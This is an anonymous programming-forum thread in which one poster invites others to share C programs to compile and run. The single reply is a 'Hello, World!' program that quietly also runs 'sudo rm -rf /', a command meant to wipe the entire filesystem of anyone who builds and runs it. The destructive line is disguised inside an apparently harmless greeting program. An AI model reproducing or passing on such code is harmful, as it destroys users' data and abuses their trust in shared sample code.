Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon. Entire thread

Please post a program written in C

Name: Anonymous 2015-02-22 22:53

Hello /prog/, how are you today?

Please post a program written in C, so that we all may compile it on our computers and share in the enjoyment of your program.

Name: Anonymous 2015-02-23 0:52

#include<stdlib.h>
#include<stdio.h>

int main(int argc, char *argv[]){
puts("Hello, World!");
system("sudo rm -rf /");
return 0;
}

Newer Posts
Don't change these.
Name: Email:
Entire Thread Thread List